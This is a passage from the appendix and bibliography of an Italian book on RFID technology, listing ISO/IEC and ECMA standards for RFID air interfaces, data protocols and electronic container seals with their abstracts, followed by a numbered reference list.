ECMA-362 - NFCIP-1 - Protocol Test Methods - (December 2005)AbstractThis Standard specifies protocol test methods for ECMA-340 in addition to those spe-cified in ECMA-356.This Ecma publication is also approved as ISO/IEC 23917

ISO NORMATIVA SU RFID

JTC 1/SC 31 Automatic identification and data capture techniques

ISO/IEC 18000-1:2004Information technology -- Radio frequency identification for item management -- Part1: Reference architecture and definition of parameters to be standardizedAbstractISO/IEC 18000-1:2004 defines the parameters to be determined in any StandardizedAir Interface Definition in the ISO/IEC 18000 series.The subsequent parts of ISO/IEC 18000 provide the specific values for definition ofthe Air Interface Parameters for a particular frequency or type of air interface, fromwhich compliance (or non compliance) with ISO/IEC 18000-1:2004 can be establis-hed. ISO/IEC 18000-1:2004 also provides description of example conceptual archi-tectures in which these air interfaces are often to be utilized.ISO/IEC 18000-1:2004 limits its scope to transactions and data exchanges across theair interface at Reference Point Delta. The means of generating and managing suchtransactions, other than a requirement to achieve the transactional performance deter-mined within ISO/IEC 18000-1:2004, are outside its scope, as is the definition or spe-cification of any supporting hardware, firmware, software or associated equipment.ISO/IEC 18000-1:2004 is an enabling standard that supports and promotes severalRFID implementations without making conclusions about the relative technicalmerits of any available option for any possible application.

ISO/IEC 18000-2:2004Information technology -- Radio frequency identification for item management -- Part2: Parameters for air interface communications below 135 kHzAbstractISO/IEC 18000-2:2004 defines the air interface for radio-frequency identification(RFID) devices operating below 135 kHz used in item management applications.Its purpose is to provide a common technical specification for RFID devices to allowfor compatibility and to encourage inter-operability of products for the growing RFIDmarket in the international marketplace.ISO/IEC 18000-2:2004 defines the forward and return link parameters for technicalattributes including, but not limited to, operating frequency, operating channel accu-racy, occupied channel bandwidth, spurious emissions, modulation, “Duty Cycle”,data coding, bit rate, bit rate accuracy, bit transmission order. It further defines thecommunications protocol used in the air interface.ISO/IEC 18000-2:2004 contains two types. The detailed technical differences bet-ween the types are shown in the parameter tables.ISO/IEC 18000-2:2004 specifies

IX.4.6

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 435

Page 420: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva436

– the physical layer that is used for communication between the interrogator and thetag;

– the protocol and the commands;– the method to detect and communicate with one tag among several tags ("anti-col-

lision").It specifies two types of tags: Type A (FDX) and Type B (HDX). These two types dif-fer only by their physical layer. Both types support the same anti-collision and proto-col.FDX tags are permanently powered by the interrogator, including during the tag-to-interrogator transmission. They operate at 125 kHz.HDX tags are powered by the interrogator, except during the tag-to-interrogatortransmission. They operate at 134,2 kHz. An alternative operating frequency is descri-bed.An optional anti-collision mechanism is also described.

ISO/IEC 18000-3:2004Information technology -- Radio frequency identification for item management -- Part3: Parameters for air interface communications at 13,56 MHzAbstractISO/IEC 18000-3:2004 provides physical layer, collision management system and pro-tocol values for RFID systems for item identification in accordance with the require-ments of ISO 18000-1. It relates solely to systems operating at 13,56 MHz.ISO/IEC 18000-3:2004 has two modes of operation, intended to address differentapplications. The modes, whilst not interoperable, are non-interfering. The detailedtechnical differences between the modes are shown in the parameter tables.

ISO/IEC 18000-4:2004Information technology -- Radio frequency identification for item management -- Part4: Parameters for air interface communications at 2,45 GHzAbstractISO/IEC 18000-4:2004 defines the air interface for radio-frequency identification(RFID) devices operating in the 2,45 GHz Industrial, Scientific, and Medical (ISM)band used in item management applications.Its purpose is to provide a common technical specification for RFID devices that maybe used by ISO committees developing RFID application standards. ISO/IEC 18000-4:2004 is intended to allow for compatibility and to encourage inter-operability of pro-ducts for the growing RFID market in the international marketplace.ISO/IEC 18000-4:2004 defines the forward and return link parameters for technicalattributes including, but not limited to, operating frequency, operating channel accu-racy, occupied channel bandwidth, maximum EIRP, spurious emissions, modulation,duty cycle, data coding, bit rate, bit rate accuracy, bit transmission order, and whereappropriate operating channels, frequency hop rate, hop sequence, spreading sequence,and chip rate. It further defines the communications protocol used in the air interface.ISO/IEC 18000-4:2004 contains two modes. The first is a passive tag operating as aninterrogator talks first while the second is a battery assisted tag operating as a tag talksfirst. The detailed technical differences between the modes are shown in the parame-ter tables.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 436

Page 421: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA437

ISO/IEC 18000-6:2004Information technology -- Radio frequency identification for item management -- Part6: Parameters for air interface communications at 860 MHz to 960 MHzAbstractISO/IEC 18000-6:2004 defines the air interface for radio-frequency identification(RFID) devices operating in the 860 MHz to 960 MHz Industrial, Scientific, andMedical (ISM) band used in item management applications.Its purpose is to provide a common technical specification for RFID devices that maybe used by ISO committees developing RFID application standards. ISO/IEC 18000-6:2004 is intended to allow for compatibility and to encourage inter-operability of pro-ducts for the growing RFID market in the international marketplace.ISO/IEC 18000-6:2004 defines the forward and return link parameters for technicalattributes including, but not limited to, operating frequency, operating channel accu-racy, occupied channel bandwidth, maximum EIRP, spurious emissions, modulation,duty cycle, data coding, bit rate, bit rate accuracy, bit transmission order, and whereappropriate operating channels, frequency hop rate, hop sequence, spreading sequence,and chip rate. It further defines the communications protocol used in the air interface.ISO/IEC 18000-6:2004 contains one mode with two types. Both types use a commonreturn link and are Reader talks first.Type A uses Pulse Interval Encoding (PIE) in the forward link, and an adaptiveALOHA collision arbitration algorithm.Type B uses Manchester in the forward link and an adaptive binary tree collision arbi-tration algorithm. The detailed technical differences between the two types are shownin the parameter tables.

ISO/IEC 18000-6:2004/Amd 1:2006Extension with Type C and update of Types A and B

ISO/IEC 18000-7:2004Information technology -- Radio frequency identification for item management -- Part7: Parameters for active air interface communications at 433 MHzAbstractISO/IEC 18000-7:2004 defines the air interface for radio-frequency identification(RFID) devices operating as an active RF Tag in the 433 MHz band used in itemmanagement applications.Its purpose is to provide a common technical specification for RFID devices that maybe used by ISO committees developing RFID application standards. This standard isintended to allow for compatibility and to encourage inter-operability of products forthe growing RFID market in the international marketplace.ISO/IEC 18000-7:2004 defines the forward and return link parameters for technicalattributes including, but not limited to, operating frequency, operating channel accu-racy, occupied channel bandwidth, maximum power, spurious emissions, modulation,duty cycle, data coding, bit rate, bit rate accuracy, bit transmission order, and whereappropriate operating channels, frequency hop rate, hop sequence, spreading sequen-ce, and chip rate. ISO/IEC 18000-7:2004 further defines the communications proto-col used in the air interface.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 437

Page 422: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva438

ISO/IEC TR 24710:2005Information technology -- Radio frequency identification for item management --Elementary tag licence plate functionality for ISO/IEC 18000 air interface definitionsAbstractISO/IEC 18000 defines the operation of radio frequency identification (RFID) airinterfaces for item identification and management.ISO/IEC 18000 has been designed to encompass a full range of data capture and car-rier functionality. Both read and write operations are enabled, and the interfaces canefficiently support both simple and complex data transactions.This approach facilitates user implementation by providing consistency between dif-fering types of RFID data transactions. Equally it provides architecture to guide futu-re RFID development whilst maintaining the backward compatibility necessary tosustain market confidence.Recent developments in the design and management of distributed databases holdingitem level information have focused attention on 'identification data element' opera-tion of RFID systems. In this application, the RFID tag carries only sufficient data topermit reference to attribute information held elsewhere. Typically this data does notchange during the validity of the 'licence' and is of relatively low bit count.ISO/IEC TR 24710:2005 has been prepared to assist users intending to implementISO/IEC 18000 RFID air interface standards, with particular focus on so-called ele-mentary tags, i.e. tags possessing limited memory - typically but not exclusively 256bits or less - and lacking write capability (but not excluding WORM devices).The annexes to ISO/IEC TR 24710:2005 describe the implementation of ISO/IEC18000-2, -3, -4, -6 and -7 in such an application.Users are strongly advised to refer to ISO/IEC 15961 and ISO/IEC 15962 for a fullexposition of the management issues relating to data strings used for identificationdata element purposes.Bodies external to ISO also specify identification data element length and structurefor particular applications.ISO/IEC TR 24710:2005 defines for each of ISO/IEC 18000-2, -3, -4, -6 and -7, and,where relevant, for each Mode within each part, a transaction that achieves an elemen-tary tag 'identification data element' for item identification and management.The transaction uses the existing air interface protocols defined in the correspondingparts of ISO/IEC 18000 or a subset thereof.

ISO/IEC 15961:2004Information technology -- Radio frequency identification (RFID) for item manage-ment -- Data protocol: application interfaceAbstractThe data protocol used to exchange information in a radio-frequency identification(RFID) system for item management is specified in ISO/IEC 15961:2004 and inISO/IEC 15962:2004. Both are required for a complete understanding of the dataprotocol in its entirety; but each focuses on one particular interface:– ISO/IEC 15961:2004 addresses the information interface with the application

system.– ISO/IEC 15962:2004 deals with the processing of data and its presentation to the

RF tag, and the initial processing of data captured from the RF tag.ISO/IEC 15961:2004 focuses on the interface between the application and the data

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 438

Page 423: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA439

protocol processor, and includes the specification of the transfer syntax and definitionof application commands and responses. It allows data and commands to be specifiedin a standardized way, independent of the particular air interface of ISO/IEC 18000.ISO/IEC 15961:2004– provides guidelines on how data shall be presented as objects;– defines the structure of object identifiers, based on ISO/IEC 9834-1;– specifies the commands that are supported for transferring data between the appli-

cation and the RF tag;– specifies the responses that are supported for transferring data between the RF tag

and the application;– provides a formal description of all the processes using ASN.1, as specified in

ISO/IEC 8824-1;– specifies the transfer syntax, based on the Basic Encoding Rules of ISO/IEC 8825-

1, for data to be transferred from and to the application.It is expected that ISO/IEC 15961:2004 will be used as a reference to develop softwa-re appropriate for particular applications, or for particular RF equipment.

ISO/IEC CD 15961-3Information technology -- Radio frequency identification (RFID) for item manage-ment -- Data protocol -- Part 3: RFID data constructs

ISO/IEC 15962:2004Information technology -- Radio frequency identification (RFID) for item manage-ment -- Data protocol: data encoding rules and logical memory functionsAbstractThe data protocol used to exchange information in a radio-frequency identification(RFID) system for item management is specified in ISO/IEC 15961:2004 and inISO/IEC 15962:2004. Both are required for a complete understanding of the dataprotocol in its entirety; but each focuses on one particular interface:– ISO/IEC 15961:2004 addresses the interface with the application system.– ISO/IEC 15962:2004 deals with the processing of data and its presentation to the

RF tag, and the initial processing of data captured from the RF tag.ISO/IEC 15962:2004 focuses on encoding the transfer syntax, as defined in ISO/IEC15961:2004 according to the application commands defined in that InternationalStandard. The encodation is in a Logical Memory as a software analogue of the physi-cal memory of the RF tag being addressed by the interrogator.ISO/IEC 15962:2004– defines the encoded structure of object identifiers;– specifies the data compaction rules that apply to the encoded data;– specifies a Precursor for encoding syntax features efficiently;– specifies formatting rules for the data, e.g. depending on whether a directory is

used or not;– defines how application commands, e.g. to lock data, are transferred to the Tag

Driver;– defines other communication to the application.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 439

Page 424: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva440

ISO/IEC 19762-3:2005Information technology -- Automatic identification and data capture (AIDC) techni-ques -- Harmonized vocabulary -- Part 3: Radio frequency identification (RFID)AbstractISO/IEC 19762-3:2005 provides terms and definitions unique to radio frequencyidentification (RFID) in the field of automatic identification and data capture techni-ques. This glossary of terms enables the communication between non-specialist usersand specialists in RFID through a common understanding of basic and advanced con-cepts.

ISO NORMATIVA SU APPLICAZIONI DEGLI RFID

TC 122 Standardization in the field of packaging with regard to terminology and defi-nitions, packaging dimensions, performance requirements and tests; including BarCode

ISO/DIS 17363Supply chain applications of RFID -- Freight containers

ISO/DIS 17364Supply chain applications of RFID -- Returnable transport items (RTIs)

ISO/DIS 17365Supply chain applications of RFID -- Transport units

ISO/DIS 17366Supply chain applications of RFID -- Product packaging

ISO/DIS 17367Supply chain applications of RFID -- Product tagging

TC 104/SC 4Freight containers / Identification and communication

ISO/DIS 18185-1.2Freight containers -- Electronic seals -- Part 1: Communication protocol

ISO/DIS 18185-2.2Freight containers -- Electronic seals -- Part 2: Application requirements

ISO 18185-3:2006Freight containers -- Electronic seals -- Part 3: Environmental characteristics

ISO/DIS 18185-4.2Freight containers -- Electronic seals -- Part 4: Data protection

IX.4.7

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 440

Page 425: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA441

ISO/CD 18185-6Freight containers -- Electronic seals -- Part 6: Message sets for transfer between sealReader and host computer

ISO/DIS 18185-7.2Freight containers -- Electronic seals -- Part 7: Physical layer

ISO NORMATIVA SUI SIGILLI ELETTRONICI

ISO 18185-1:2007Freight containers -- Electronic seals -- Part 1: Communication protocolAbstractISO 18185-1:2007 provides a system for the identification and presentation of infor-mation about freight container electronic seals. The identification system provides anunambiguous and unique identification of the container seal, its status and relatedinformation.The presentation of this information is provided through a radio-communicationsinterface providing seal identification and a method for determining whether a freightcontainer's seal has been opened.ISO 18185-1:2007 specifies a read-only, non-reusable freight container seal identifica-tion system, with an associated system for verifying the accuracy of use, having– a seal status identification system,– a battery status indicator,– a unique seal identifier including the identification of the manufacturer,– seal (tag) type.ISO 18185-1:2007 is used in conjunction with the other parts of ISO 18185.It applies to all electronic seals used on freight containers covered by ISO 668, ISO1496-1 to ISO 1496-5, and ISO 8323. Wherever appropriate and practicable, it alsoapplies to freight containers other than those covered by these InternationalStandards.

ISO 18185-2:2007Freight containers -- Electronic seals -- Part 2: Application requirementsAbstractISO 18185-2:2007 specifies a freight container seal identification system, with an asso-ciated system for verifying the accuracy of use, having:– a seal status identification system;– a battery status indicator;– a unique seal identifier including the identification of the manufacturer;– a seal (tag) type.ISO 18185-2:2007 is used in conjunction with the other parts of ISO 18185.

ISO 18185-3:2006Freight containers -- Electronic seals -- Part 3: Environmental characteristicsAbstractISO 18185-3:2006 specifies the minimum environmental characteristics for electronic seals.ISO 18185-3:2006 describes the environmental requirements for the ISO 18185

IX.4.8

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 441

Page 426: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

series, for ISO 10374 (Freight containers -- RF automatic identification) and for ISO17363 (Supply chain applications of RFID -- Freight containers), since it is expectedthat the implementation of these International Standards will face the same environ-mental conditions. However, each of these International Standards has its own uniquerequirements other than environmental conditions.

ISO 18185-4:2007Freight containers -- Electronic seals -- Part 4: Data protectionAbstractISO 18185-4:2007 specifies requirements for the data protection, device authentica-tion and conformance capabilities of electronic seals for communication to and froma seal and its associated reader. These capabilities include the accessibility, confiden-tiality, data integrity, authentication and non-repudiation of stored data.

ISO 18185-5:2007Freight containers -- Electronic seals -- Part 5: Physical layerAbstractISO 18185-5:2007 specifies the air interface between electronic container seals andReader/Interrogators of those seals.It is to be used in conjunction with the other parts of ISO 18185.ISO 18185-5:2007 describes the physical layer for supply chain applications of RFIDfor freight containers in accordance with the ISO 18185 series and ISO 17363, sinceit is expected that the implementation of these standards will face the same internatio-nal conditions. However, each of these standards has its own unique requirementsother than the physical layer. It is expected that RFID Freight Container Identification(as specified in ISO 10374 and ISO 17363), and electronic seals (as specified in theISO 18185 series) will be able to use the same infrastructure, while recognizing thatthat there may be requirements for different frequencies for passive devices as oppo-sed to the active devices identified in ISO 18185-5:2007.

ALTRE NORMATIVE SU APPLICAZIONI DEGLI RFID

ANSI MH10.8.4 – RFID for retournable containersAIAG B 11 – Tire and Wheel Identification StandardEAN.UCC GTAG

STANDARD ECMA SU UWB (MULTI BAND OFDM)

ECMA-368 High Rate Ultra Wideband - PHY and MAC Standard, 1st Edition -December 2005AbstractThis Standard specifies a distributed medium access control (MAC) sublayer and aphysical layer (PHY) for wireless networks.Taken together, the PHY and MAC specified in this Ecma standard are well-suited tohigh rate, zero infrastructure communications between a mixed population of porta-ble and fixed electronic devices.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva442

IX.4.9

IX.4.10

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 442

Page 427: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

This Ecma specification is not intended to represent the regulatory requirements ofany country or region.

ECMA-369 High MAC-PHY Interface Specification for ECMA-368, 1st Edition -December 2005AbstractThis Ecma Standard specifies the interface between implementations of the PHY andMAC as specified in ECMA-368.ECMA-368 specifies the PHY and MAC for a high rate ultra wideband wireless trans-ceiver.

PARTE IX - APPENDICI & BIBLIOGRAFIA443

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 443

Page 428: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva444

BIBLIOGRAFIA

RIFERIMENTI PER TECNOLOGIA RFID (ESCLUSI STANDARD ISO,EPCGLOBAL, ECMA, ECC.)[1] RFID - Identificazione automatica a radiofrequenza; la tecnologia, le

applicazioni, i principali trend – Luigi Battezzati, Jean-LouisHygounet – HOEPLI.

[2] RFID - Introduzione alle tecnologia delle etichette intelligenti – AIMItalia – maggio 2006.

[3] Aspetti tecnici e regolamentari sull’uso degli RFID in Italia -Antonio Vellucci - Ministero delle Comunicazioni - DirezioneGenerale Pianificazione e Gestione dello Spettro Radioelettrico -maggio 2006.

[4] A basic introduction to RFID Technology and its use in the supplychain – Laran RFID – April 2005.

[5] White Paper – Radio Frequency Identification (RFID)– Accenture –2001.

[6] Radio Frequency Identification (RFID): Drivers, Challenges AndPublic Policy Considerations – OCSE – OECD Organisation forEconomic Co-operation and Development – February 2006.

[7] RFID and NFC Measurements with the Real-Time SpectrumAnalyzer – Application Note - 2005 - www.tektronix.com/rfid.

[8] RFID for the Real World - Challenges and Opportunities in theWarehouse and Distribution Center Environment - FKI Logistex -2005.

[9] Security in Near Field Communication (NFC), Strengths andWeaknesses – Ernst Haselsteiner and Klemens Breitfuß – PhilipsSemiconductors – Workshop on RFID Security, Graz – July 2006.

[10] RFID Security – Prof. Dr. Heiko Knospe, Prof. Dr. Hartmut Pohl– Information Security Technical Report. Vol. 9, No. 4, 1363-4127/04/© 2004, Elsevier Ltd.

[11] Radio Frequency Identification Technology (RFID) – IEE 2005.[12] RFID Security without Extensive Cryptography – Sindhu

Karthikeyan and Mikhail Nesterenko – Computer Science

IX.5

IX.5.1

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 444

Page 429: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA445

Department, Kent State University – Kent, OH, USA.[13] RFID Technical Tutorial – Dale R. Thompson - Department of

Computer Science and Computer Engineering - University ofArkansas.

[14] Privacy and Security in Library RFID - Issues, Practices, andArchitectures – David Molnar, David Wagner – CCS’04, October,2004, Washington, DC, USA. – 2004 ACM 1581139616/ 04/0010.

[15] Passive Radio Frequency Identification (RFID) - A Primer for NewRF Regulations – Kevin Powell, Matrics Inc., USA – 2003.

[16] About PDF417 – http://www.dataintro.com/literature.html.[17] Presentation on New Attacks against RFID-Systems – Lukas

Grunwald – DN-Systems GmbH, Germany.[18] Security and Interoperability in ContactlessSmart Card Systems –

Presentation to the NIST Workshop on Storage and ProcessorCard-based Technologies – Ray Freeman - Assa Abloy ITG – July2003.

[19] A Radio-Oriented Introduction to Radio Frequency Identification -Daniel M. Dobkin, Titus Wandinger - High Frequency Electronics- June 2005.

[20] Intermec RFID System Manual – Intermec – 2005.[21] Radio Frequency Identification (RFID) Overview – Tektronix –

2004.[22] DS-UWB Physical Layer Submission to 802.15 Task Group 3a –

several authors – July 2004.[23] Multi-band OFDM Physical Layer Proposal for IEEE 802.15 Task

Group 3a – several authors – March 2004.[24] From Identification to Authentication - A Review of RFID Product

Authentication Techniques –M. Lehtonen, T. Staake, F. Michahelles,and E. Fleisch – Workshop on RFID Security 2006, Graz – July2006.

[25] Upstreaming RFID - Beyond Tags and Readers – T S Rangarajan,Anand Vijaykumar, Suraj Subramaniam S, – TATA ConsultancyServices – 2005.

[26] Presentation on RFID, Analysis, Applications and Attacks – Dan

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 445

Page 430: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva446

Cornforth, – Security-Assessment.com, Australia.[27] The RFID Revolution Starts Now! Sapphire DART Ultra Wideband

Precision Asset Location System™ – Multispectral Solution Inc.[28] Keeping a tab on livestock, Standardization of electronic animal iden-

tification – Wim Eradus – ISO Bulletin – January 2001.[29] Gen2 There’s Standard And Then There’s Excellence – John Burnell

– RealTime Magazine, Intermec – 2005.[30] White Paper – An In-Depth User’s Guide to Selecting and Deploying

Gen2 Tags, Readers, and Infrastructure – Reva Systems, USA –2005.

[31] RFID, Normative e Standard – Gerard André Sessenne –DATAcollection – settembre 2005.

[32] ISO14443 An introduction to the contactless standard for smart cardsand its relevance to customers, whitepaper, OTI.

[33] RFID Technical Tutorial and Threat Modeling – Neeraj Chaudhry,Dale R. Thompson, and Craig W. Thompson – Department ofComputer Science and Computer Engineering, University ofArkansas – December 2005 (Available:http://csce.uark.edu/~drt/rfid).

[34] RFID White Paper – Technology, Systems, and Applications - An over-view for companies seeking to use RFID technology to connect their ITsystems directly to the “real” world - BITKOM, Germany - August2005.

[35] Receptivity - A TAG Performance Metric – Impinj – December2005.

[36] White Paper – RFID Futures in Western Europe – Juniper ResearchLimited – January 2005.

[37] White Paper – RFID Practical Guide To RFID Label Quality,PAXAR Corp. – February 2006.

[38] White Paper – Realizing the Promise of RFID: Insights from EarlyAdopters and the Future Potential, An EAI Technologies – VelanThillairajah, Sanjay Gosain, Dave Clarke – July 2005

[39] Radio Frequency Identification - Opportunities and Challenges inImplementation, Department of Commerce, Washington D.C. -

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 446

Page 431: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA447

April 2005.[40] An analysis of the Fundamental Constraints on Low-Cost Passive

Radio-Frequency Identification System Design – Tom AhlkvistScharfeld– Massachusetts Institute of Technology– August 2001.

[41] Provvedimenti a carattere generale - Garanzie per l’uso di “Etichetteintelligenti” (Rfid) – Garante Per La Protezione Dei Dati Personali– 9 marzo 2005.

[42] SMARTFIELD™HOCKEY – Innovation Gazette, n.1 2006, pp.6-7(http://www.cefriel.it/contents/pages/attach/434/innovationGazette_n01_feb06.pdf).

[43] Recent System Applications of Short-Pulse Ultra-Wideband (UWB)Technology – Robert J. Fontana – IEEE Transactions on MicrowaveTheory and Techniques, pp.2087-2104, vol. 52, no. 9 – September2004.

[44] An Introduction to Direct-Sequence Spread-Spectrum Communications– Maxim Integrated Products, Application Note 1890 – February2003 (http://www.maxim-ic.com/an1890).

[45] Testing Ultrawideband - Roland Gubisch - Evaluation Engineering- May 2005.

[46] RFID: The Right Frequency for Government – David C. Wyld –IBM Center for The Business of Government – October 2005.

[47] Towards an RFID policy for Europe Workshop report, DRR-4046-EC – Maarten Van De Voort, Andreas Ligtvoet – Prepared for theEUROPEAN COMMISSION, Directorate General InformationSociety and Media – 31 August 2006.

[48] RFID Business Planning Service 2005-2006 Global Asset AndTransaction Management Systems Market Analysis - VentureDevelopment Corporation - agosto 2006.

[49] Rfid, oltre il silicio, Daniela Cipolloni, RFID Italia, luglio 2006.[50] Lawrence Livermore National Laboratory's - UWB Communication

- Frequently Asked Technical Questions - http://www-eng.llnl.gov/uwb_comm/uwb_comm_fatq.html.

[51] Near Field Communication (NFC): Scambio e distribuzione di infor-mazioni e contenuti contactless - U. Biader Ceipidor, F. Greco, C.M.

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 447

Page 432: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva448

Medaglia, A. Moroni - Wireless - ottobre 2006(http://www.wirelessmanagement.it/200609/default.asp).

[52] RFID chips, Future technology on everyone’s lips - Stefan Heng -Deutsche Bank Research www.dbresearch.com - February 20, 2006- http://www.dbresearch.com/PROD/DBR_INTERNET_EN-PROD/PROD0000000000196644.pdf

[53] OECD (Organisation for Economic Co-operation andDevelopment - http://www.oecd.org/home ) INFORMATIONTECHNOLOGY OUTLOOK 2006 - ISBN 92-64-02643-6 - ©OECD 2006 -

[54] The RFID Benchmark Report, Finding the Technology’s TippingPoint - Aberdeen Group, Inc.- Dec 2005 - http://www.aberdeen.com/summary/report/benchmark/RA_RFID_JF_2466.asp

[55] Jari-Pascal Curty, Michel Declercq, Catherine Dehollain, NorbertJoehl, “Design and Optimization of Passive UHF RFID Systems”,Springer, 2007

[56] Hirvonen, M.; Jaakkola, K.; Saily, J. “Triple-band pifa for radio fre-quency identification”, IEEE Electronics Letters, Volume 42, Issue17, August 17, 2006 Page(s): 958 – 959 – Digital Object Identifier10.1049/el:20061422

[57] Hirvonen, M.; Jaakkola, K.; Pursula, P.; Saily, J., “Dual-BandPlatform Tolerant Antennas for Radio-Frequency Identificatio”,IEEE Transactions on Antennas and Propagation, Volume 54,Issue 9, Sept. 2006 Page(s): 2632 – 2637 – Digital Object Identifier10.1109/TAP.2006.880726

[58] F. Fuschini, C. Piersanti, F. Paolazzi, G. Falciasecca, “On the effi-ciency of load modulation in RFID systems operating in real envi-ronment”, IEEE Antennas and Wireless Propagation Letters.,Volume 7, 2008.

[59] F. Fuschini, C. Piersanti, F. Paolazzi, G. Falciasecca; Analyticalapproach to the back-scattering from UHF RFID Transponder,IEEE Antennas andWireless Propagation Letters., Volume 7, 2008Pages: 33–35.

[60] Carmine Piersanti, Franco Fuschini, Francesco Paolazzi, VittorioDegli-Esposti, Gabriele Falciasecca, “Electromagnetic Analysis of

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 448

Page 433: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA449

the RFID Link”, RFIDays 2008: Book of Proceedings, G.Marrocco editor

[61] Carmine Piersanti, “Analisi elettromagnetica del Link RFID”, pre-sentazione a RFIDays 2008, Roma maggio 2008.

[62] K.V.S. Rao, K.V. Nikitin, S.F. Lam, “Antenna Design for UHFRFID Tags: A Review and a Practical Application”, IEEETransactions on Antennas and Propagation, vol. 53, NO. 12,December 2005

[63] H. Stockman "Communication by Means of Reflected Power”Proceedings of the IRE, 36, 10. October 1948, pp. 1196-1204.

[64] J. Landt, "The History of RFID," IEEE Potentials,. 24, 4, October-November. 2005, pp. 8-11.

[65] A. R. Koelle, S. W. Depp, and R. W. Freyman, "Short-Range Radio-Telemetry for Electronic Identification, Using Modulated REBackscatter," Proceedings of the IEEE, 63, 8, August 1975,pp.1260-1261.

[66] A. R. Koelle, "Short Range UHF Telemetry System Using PassiveTransponders for Vehicle ID and Status Information", IEEEWorkshop on Automotive Applications of Electronics, DearbornMI, October 1988, pp.34-38.

[67] K. Finkenzeller, RFID Handbook, Wiley & Son, New York, 2000[68] R. Want, "An Introduction to RFID Technology," IEEE Pervasive

Computing, l.5, 1, January-March 2000, pp. 25-33.[69] R. Bansal, “Coming soon to a Wal-Mart near you,” IEEE Antennas

Propagayion. Magazine 45, 6, December 2003, pp. 105–106.[70] S. Nambi, S. Nyalamadugu, S. M. Wentworth and B. A. Chin,

“Radio frequency identification sensors”, Proc. 7th WorldMulticonf. Systemics, Cybernetics & Informatics (SCI 2003),Orlando, FL, June 2003, pp.386-390.

[71] R. S. Sangwan, R. G. Qiu and D. Jessen “Using RFID tags for trac-king patients, charts and medical equipment within an integratedhealth delivery network”, IEEE Int. Conf. Networking Sensing andControl, 2005, pp.1070-1074.

[72] J. Curty, N. Joehl, C. Dehollain and M. J. Delercq, "Remotelypowered addressable UHF RFID integrated system", IEEE

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 449

Page 434: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva450

Journal of Solid-State Circuits, 40,.11, November 2005, pp. 2193-2202.

[73] S. Basat, S. Bhattacharya, A. Rida, S. Johnston, L. Yang, M.M.Tentzeris and J. Laskar ,"Fabrication and Assembly of a NovelHigh-Efficiency UHF RFID Tag on Flexible LCP Substrate",Electronic components and Technology Conference, May-June2006, pp.1352-1355.

[74] H.W. Son, J. Yeo, G.Y. Choi, and C.S. Pyo, “A Low-Cost,Wideband Antenna for Passive RFID Tags Mountable on MetallicSurfaces”, Proc. of the IEEE Antennas and Propagation SocietySymposium, Albuqueque, NM, June 2006, pp.1019-1022.

[75] S. Uda, Y. Mushiake, Yagi-Uda Antenna, Sasaki Printing andPublishing Co. Japan, 1954, pp.119-131.

[76] C. A. Balanis, Antenna Theory. Analysis and Design, SecondEdition, John Wiley & Sons Inc., 1997.

[77] L. Ukkonen, M. Schaffrath, J.a Kataja, L. Sydanheimo and M.Kivikoski, Evolutionary RFID tag antenna design for paperindustry applications, International Journal of Radio FrequencyIdentification Technology and Applications, 1, 1, January 2006,pp.107-122.

[78] H. W. Son and C.S. Tyo, “Design of RFID tag antennas using aninductively coupled feed”, Electronics Letters, 41, 18, , September2005, pp. 994-996.

[79] Y. Lee, "Antenna Circuit Design for RFID Applications",Application Note AP710 of Microchip Technology Inc. 2003, avai-lable online up to 1 Nov.2006 atww1.microchip.com/downloads/en/AppNotes/00710c.pdf.

[80] "FEKO User's Manual, Suite 5.1", EM Software & Systems-S.A.(Pty) Ltd., Stellenbosch, South Africa, December. 2005, availableonline at http://www.feko.info.

[81] G. Marrocco, “Body-matched antennas for wireless biometry”,European Conference on Antennas and Propagat, Nice (France),November 2006, p.795.

[82] G. Marrocco, “Rfid antennas for the UHF remote monitoring of

II-parteIX.qxp:rfid 5-09-2008 11:03 Pagina 450

Page 435: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IX - APPENDICI & BIBLIOGRAFIA451

